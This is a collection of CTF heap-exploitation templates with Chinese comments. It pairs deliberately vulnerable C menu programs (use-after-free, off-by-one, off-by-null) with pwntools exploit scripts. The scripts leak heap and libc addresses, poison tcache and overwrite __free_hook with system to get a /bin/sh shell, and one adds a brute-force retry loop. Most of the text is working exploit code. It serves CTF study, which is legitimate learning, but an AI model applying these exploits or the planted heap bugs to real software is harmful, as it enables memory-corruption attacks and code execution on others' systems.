这里记录一些ctf中堆pwn的板子,总结学习
UAF打掉tcache拿libc
//uaf
#include
#include
char *heap[0x20];
int num=0;
void create()
{
if(num>=0x20)
{
puts("no more");
return;
}
int size;
puts("how big");
scanf("%d",&size);
if(size>=0x20)
{
puts("no more");
return;
}
heap[num]=(char *)malloc(size);
num++;
}
void show(){
int i;
int idx;
char buf[4];
puts("idx");
(read(0, buf, 4));
idx = atoi(buf);
if (!heap[idx]) {
puts("no hvae things\n");
} else {
printf("Content:");
printf("%s",heap[idx]);
}
}
void dele()
{
int i;
int idx;
char buf[4];
puts("idx");
(read(0, buf, 4));
idx = atoi(buf);
if (!heap[idx]) {
puts("no hvae things\n");
} else {
free(heap[idx]);
num--;
}
}
void edit()
{
int size;
int i;
int idx;
char buf[4];
puts("idx");
(read(0, buf, 4));
idx = atoi(buf);
if (!heap[idx]) {
puts("no hvae things\n");
} else {
puts("how big u read");
scanf("%d",&size);
if(size>0x20)
{
puts("too more");
return;
}
puts("Content:");
read(0,heap[idx],size);
}
}
void menu(void){
puts("1.create");
puts("2.dele");
puts("3.edit");
puts("4.show");
}
void main()
{
int choice;
while(1)
{
menu();
scanf("%d",&choice);
switch(choice)
{
case 1:create();break;
case 2:dele();break;
case 3:edit();break;
case 4:show();break;
default:puts("error");
}
}
}
EXP
from pwn import *
r=process('./uaf')
elf = ELF("uaf")
libc=elf.libc
# context.log_level='debug'
def add(size):
r.sendlineafter("4.show\n",'1')
r.sendlineafter("how big\n",str(size))
def dele(idx):
r.sendlineafter("4.show\n",'2')
r.sendlineafter("idx\n",str(idx))
def edit(idx,size,con):
r.sendlineafter("4.show\n",'3')
r.sendlineafter("idx\n",str(idx))
r.sendlineafter("how big u read\n",str(size))
r.sendafter("Content:\n",con)
def show(idx):
r.sendlineafter("4.show\n",'4')
r.sendlineafter("idx\n",str(idx))
def dbg():
gdb.attach(r)
pause()
for i in range(7):
add(0x10)
# 拿堆地址
dele(0)
dele(1)
show(1)
r.recvuntil("Content:")
heap=u64(r.recv(6)+'\x00'*2)-0x001680+0x10
print(hex(heap))
# 申请到tcache管理空间,同时恢复tcache结构体功能,保持0x20堆块正常运行
edit(0,0x10,p64(heap))
add(0x10)
add(0x10)
add(0x10)
add(0x10)
add(0x10)
edit(7,0x20,p64(0)*4) # 7即tcache结构体
# 利用uaf申请到tcache结构题内管理0x250堆块的部分
dele(5)# 5-1
edit(5,0x10,p64(heap+0x20))
add(0x10)
add(0x10)
edit(10,0x20,p64(0x0000000007000000))
dele(7)
# 打到unsortbin后切割获取libc
add(0x10)
show(10)
r.recvuntil("Content:")
base=u64(r.recv(6)+'\x00'*2)-0x3ebee0
print(hex(base))
free=base+libc.sym['__free_hook']
sys=base+libc.sym['system']
# 恢复一下结构体,进行最后的uaf利用
edit(10,0x20,p64(0)*4)
dele(10)
edit(10,0x20,p64(free))
add(0x10)
add(0x10)
edit(11,0x10,p64(sys))
edit(10,0x10,"/bin/sh\x00")
dele(10)
r.interactive()
小溢出堆叠(offbyone/向下合并/万用合并)
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
void sandbox(){
struct sock_filter filter[] = {
BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
};
struct sock_fprog prog = {
.len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
.filter = filter,
};
prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
int init()
{
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
return setvbuf(stderr, 0LL, 2, 0LL);
}
int num=0;
char *heaparray[0x10];
size_t realsize[0x10];
void create(){
if(num>=0x20)
{
puts("no more");
return;
}
int size;
puts("Size of Heap : ");
scanf("%d",&size);
heaparray[num]=(char *)malloc(size);
realsize[num]=size;
num++;
}
void show(){
int idx ;
char buf[4];
printf("Index :\n");
read(0,buf,4);//输入堆块的index
idx = atoi(buf);
if(idx < 0 || idx >= 0x10){
puts("Out of bound!");
_exit(0);
}
if(heaparray[idx]){//根据序列进行查找
//打印指定堆块内容
printf("Size : %ld\nContent : %s\n",realsize[idx],heaparray[idx]);
puts("Done !");
}else{
puts("No such heap !");
}
}
void edit(){
int idx ;
char buf[4];
printf("Index :\n");
read(0,buf,4);//输入堆的序列号
idx = atoi(buf);
if(idx < 0 || idx >= 0x10){//判断序列号的正确性
puts("Out of bound!");
_exit(0);
}
//若序列号正确
if(heaparray[idx]){
int size;
puts("Size of Heap : ");
scanf("%d",&size);
printf("Content of heap : \n");
read(0,heaparray[idx],size);
//调用read_input函数输入堆的内容
puts("Done !");
}else{
puts("No such heap !");
}
}
void dele(){
int idx ;
char buf[4];
printf("Index :\n");
read(0,buf,4);//输入index
idx = atoi(buf);
if(idx < 0 || idx >= 0x10){//判断堆块序列的合法性
puts("Out of bound!");
_exit(0);
}
if(heaparray[idx]){
free(heaparray[idx]);//free heaparray[idx]指针
realsize[idx] = 0 ;
heaparray[idx]=NULL;
puts("Done !");
num--;
}else{
puts("No such heap !");
}
}
void menu(void){
puts("1.create");
puts("2.dele");
puts("3.edit");
puts("4.show");
}
void main()
{
init();
sandbox();
int choice;
while(1)
{
menu();
scanf("%d",&choice);
switch(choice)
{
case 1:create();break;
case 2:dele();break;
case 3:edit();break;
case 4:show();break;
default:puts("error");
}
}
}
EXP
from pwn import *
r=process('./zheap')
elf = ELF('zheap')
libc=elf.libc
context.log_level='debug'
def add(size):
r.sendlineafter("4.show\n",'1')
r.sendlineafter("Size of Heap : \n",str(size))
def dele(idx):
r.sendlineafter("4.show\n",'2')
r.sendlineafter("Index :\n",str(idx))
def edit(idx,con):
r.sendlineafter("4.show\n",'3')
r.sendlineafter("Index :\n",str(idx))
r.sendafter("Content of heap : \n",con)
def show(idx):
r.sendlineafter("4.show\n",'4')
r.sendlineafter("Index :\n",str(idx))
def dbg():
gdb.attach(r)
pause()
# 9个0x80堆=0x480,填0x21自主合并
add(0x18)#0
add(0x78)#1
for i in range(10):
add(0x78)
for i in range(2,10):
edit(i,p64(0x21)*14)
edit(0,'a'*0x18+p64(0x421))
dele(1)
# 泄露完libc去找堆复用
add(0x18)
show(1)
r.recvuntil("Content : ")
leak=u64(r.recv(6)+'\x00'*2)
print(hex(leak))
base=leak-0x3ec090
sys=libc.sym['system']+base
free=libc.sym['__free_hook']+base
# 用vmmap看heap结构体存在堆复用
dele(1)
edit(11,p64(free))
add(0x18)
add(0x18)
edit(11,"/bin/sh")
edit(12,p64(sys))
dele(11)
r.interactive()
offbyone向下合并构造堆复用(malloc_consolidate拿libc)
题目漏洞就是edit的offbyone,数据输入用的scanf输入
from pwn import *
context.log_level = 'debug'
context.arch='amd64'
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
s = lambda data :p.send(data)
sa = lambda text,data :p.sendafter(text, str(data))
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
uu32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg = lambda name,data :p.success(name + "-> 0x%x" % data)
p = process("bitflip")
elf = ELF('bitflip')
libc = elf.libc
def cmd(choice):
sla('Your choice: ',choice)
def add(idx,size):
cmd(1)
sla('Index: ',idx)
sla('Size: ',size)
def edit(idx,content):
cmd(2)
sla('Index: ',idx)
p.sendlineafter(': ',content)
def show(idx):
cmd(3)
sla('Index: ',idx)
def delete(idx):
cmd(4)
sla('Index: ',idx)
def dbg():
gdb.attach(p)
pause()
for i in range(9):
add(i,0x48)
for i in range(8):
delete(i)
p.sendlineafter('Your choice: ','99999999'*0xf0)
for i in range(7):
add(i,0x48)
add(7,0x48)
show(7)
p.recvuntil('Content: ')
libc_base = u64(p.recv(6)+'\x00'*2)-160-0x3EBC40
lg('libc_base',libc_base)
sys=libc.sym['system']+libc_base
free=libc.sym['__free_hook']+libc_base
for i in range(9,16):
add(i,0x18)
for i in range(16,23):
add(i,0x28)
add(23,0x18)
add(24,0x28)
add(25,0x18)
add(26,0x18)
for i in range(9,23):
delete(i)
delete(25)
edit(23,'a'*0x18+'\x51')
delete(24)
add(27,0x48)
edit(27,p64(0x21)*6+p64(free-0x10))
for i in range(9,16):
add(i,0x18)
add(24,0x18)
edit(24,'/bin/sh\x00')
add(25,0x18)
edit(25,p64(sys))
delete(24)
p.interactive()
大堆合并(offbynull/向前合并)
题目就是offbynull漏洞,一般可申请的堆都在0x100作业
EXP
from pwn import *
context.log_level = 'debug'
context.arch='amd64'
s = lambda data :p.send(data)
sa = lambda text,data :p.sendafter(text, str(data))
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
uu32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg = lambda name,data :p.success(name + "-> 0x%x" % data)
p = process("old_school_revenge")
elf = ELF('old_school_revenge')
libc = elf.libc
def cmd(choice):
sla('Your choice: ',choice)
def add(idx,size):
cmd(1)
sla('Index: ',idx)
sla('Size: ',size)
def edit(idx,content):
cmd(2)
sla('Index: ',idx)
p.sendlineafter(': ',content)
def show(idx):
cmd(3)
sla('Index: ',idx)
def delete(idx):
cmd(4)
sla('Index: ',idx)
def dbg():
gdb.attach(p)
pause()
for i in range(9):
add(i,0x48)
for i in range(8):
delete(i)
p.sendlineafter('Your choice: ','99999999'*0xf0)
for i in range(7):
add(i,0x48)
add(7,0x48)
show(7)
p.recvuntil('Content: ')
libc_base = u64(p.recv(6)+'\x00'*2)-160-0x3EBC40
lg('libc_base',libc_base)
free=libc_base+libc.sym['__free_hook']
sys=libc_base+libc.sym['system']
# 前面是看到scanf输入直接抄板子梭哈了,获取到libc
for i in range(10,17):
add(i,0xf8)
add(17,0xf8)
add(18,0x88)# edit中间这个chunk
add(19,0xf8)
add(20,0x88)
for i in range(10,17):
delete(i)
delete(17)
edit(18,'a'*0x80+p64(0x190))
delete(19)
for i in range(10,17):
add(i,0xf8)
add(21,0xf8)
add(22,0x88)
delete(18)
edit(22,p64(free))
add(23,0x88)
edit(23,'/bin/sh\x00')
add(24,0x88)
edit(24,p64(sys))
delete(23)
p.interactive()
大堆合并(offbynull在libc2.31/2.29下的利用)
题目限制堆数量10个,for循环编号赋予
基本上无size限制,仅有offbynull漏洞,libc-2.31
思路
伪造出一个chunk,使其能够绕过这两个检测。
一个是向低地值合并的检测:
if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size while consolidating");
另一个就是unlink时候的检测
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P, AV);
image.png
EXP
from pwn import *
context.log_level = 'debug'
s = lambda data :p.send(data)
sa = lambda text,data :p.sendafter(text, str(data))
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
uu32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg = lambda name,data :p.success(name + "-> 0x%x" % data)
p = process("bornote")
elf = ELF('bornote')
libc = elf.libc
def cmd(choice):
sla("aaa's cmd: ",choice)
def add(size):
cmd(1)
sla('Size: ',size)
def edit(idx,content):
cmd(3)
sla('Index: ',idx)
p.sendlineafter('Note: ',content)
def show(idx):
cmd(4)
sla('Index: ',idx)
def delete(idx):
cmd(2)
sla('Index: ',idx)
def dbg():
gdb.attach(p)
pause()
fakechunk = 0x00005561306c6f00
sla('username: ','aaa')
# 这里size最大最好别超过0x440,不然放进largebin时/不在同一个区间上
add(0x418) # 0
add(0x128) # 1 # 最后绕过tcache个数检测,和最后利用堆复用的chunk一样大
add(0x418) # 2
add(0x438) # 3
add(0x148) # 4
add(0x428) # 5
add(0x138) # 6
# fakechunk 粘fd和bk
delete(0)
delete(3)
delete(5)
#设置fakechunk size位
delete(2)
add(0x438) # 0
edit(0,'a' * 0x418 + p64(0xb01)[:7])
add(0x418) # 2
add(0x428) # 3
add(0x418) # 5
# 设置bk
delete(5)
delete(2)
add(0x418) # 2
edit(2,p64(0))
add(0x418) # 5
# 设置fd
delete(5)
delete(3)
add(0x5f8)# 3 # 置入largebin
add(0x428)# 5
edit(5,'')
add(0x418)# 7
add(0xf8)# 8
# 设置prevsize
edit(6,'a'*0x130+p64(0xb00))
delete(3)
add(0x10)# 3
show(7)
p.recvuntil("Note: ")
libc_base = u64(p.recv(6).ljust(8,'\x00'))- 0x1EBBE0
lg('libc_base',libc_base)
sys = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]
add(0x128)#9
delete(1)
delete(9)
edit(7,p64(free_hook))
add(0x128)# 1
add(0x128)# 9
edit(1,"/bin/sh\x00")
edit(9,p64(sys))
delete(1)
p.interactive()
爆破
思路
漏洞是UAF,但每次申请的size大小不可控,导致无法准确申请到想要的堆
尽量避免doublefree的申请,降低爆破次数
EXP
#coding=utf-8
from pwn import *
# context.log_level = 'debug'
s = lambda data :p.send(data)
sa = lambda text,data :p.sendafter(text, str(data))
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
uu32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg = lambda name,data :p.success(name + "-> 0x%x" % data)
# p = process("random_heap")
elf = ELF('random_heap')
libc = elf.libc
def cmd(choice):
sla("Your choice: ",choice)
def add(idx,size):
cmd(1)
sla("Index: ",idx)
sla("Size: ",size)
def edit(idx,content):
cmd(2)
sla("Index: ",idx)
p.sendafter("Content: ",content)
def show(idx):
cmd(3)
sla("Index: ",idx)
def delete(idx):
cmd(4)
sla("Index: ",idx)
def dbg():
gdb.attach(p)
pause()
def pwn():
add(0,0xf8)
add(1,0x88)
edit(1,'/bin/sh\x00')
# 拿堆地址
delete(0)
edit(0,'a'*0x10)
delete(0)
show(0)
p.recvuntil("Content: ")
heap=u64(p.recv(6)+'\x00'*2)-0x260
lg('heap',heap)
for i in range(6):
edit(0,'a'*0x10)
delete(0)
show(0)
p.recvuntil("Content: ")
libc_base=u64(p.recv(6)+'\x00'*2)-96-0x3ebc40
lg('libc_base',libc_base)
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
add(2,0x18)
delete(2)
edit(0,p64(free_hook)*2)
delete(2)
edit(0,p64(free_hook)*2)
add(2,0x18)
show(2)
tmp = u64(((p.recvuntil("\x7f",timeout=0.4))[-6::]).ljust(8,'\x00'))
if(tmp!=free_hook):
exit()
add(3,0x18)
edit(3,p64(system))
delete(1)
p.sendline("cat flag")
print p.recvuntil("}",timeout=0.4)
times = 0
while 1:
try:
p = process("./random_heap")
pwn()
p.interactive()
except:
times += 1
print("="*8+str(times)+" times"+"="*8)
p.close()